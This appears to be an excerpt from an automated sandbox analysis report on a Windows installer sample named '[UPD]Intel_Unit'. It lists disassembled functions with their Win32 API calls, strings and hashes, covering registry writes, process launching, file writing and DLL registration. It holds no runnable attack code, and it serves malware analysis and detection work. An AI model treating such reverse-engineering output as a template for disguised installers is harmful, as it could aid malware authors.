F, xrefs: 00406AE8

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: F$%s=%s$NUL$[Rename]
API String ID: 565278875-1653569448
Opcode ID: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
Opcode Fuzzy Hash: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98

Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 00406195, 0040619A, 004061A1, 004061B0

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-2769509956
Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD

Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Error registering DLL: Could not load %s, xrefs: 004024DB
1j, xrefs: 00402473
Error registering DLL: %s not found in %s, xrefs: 0040249A

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: 1j$Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
API String ID: 1033533793-1472690300
Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D

Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
GetSysColor.USER32(00000000), ref: 00403E00
SetTextColor.GDI32(?,00000000), ref: 00403E0C
SetBkMode.GDI32(?,?), ref: 00403E18
GetSysColor.USER32(?), ref: 00403E2B
SetBkColor.GDI32(?,?), ref: 00403E3B
DeleteObject.GDI32(?), ref: 00403E55
CreateBrushIndirect.GDI32(?), ref: 00403E5F

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: command="%s", xrefs: 00402241
Exec: success ("%s"), xrefs: 00402263

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D

Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
GetMessagePos.USER32 ref: 00404871
ScreenToClient.USER32(?,?), ref: 00404889
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1

Strings

f, xrefs: 0040489D

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00013E00,00000064,?), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58

Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
wsprintfW.USER32 ref: 00404457
SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A

Strings

%u.%u%s%s, xrefs: 00404444
@rD, xrefs: 00404402

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$@rD
API String ID: 3540041739-1813061909
Opcode ID: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
Opcode Fuzzy Hash: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679

Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
CharNextW.USER32(?,?,?,00000000), ref: 004060AA
CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Strings

*?|<>/":, xrefs: 0040608A

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
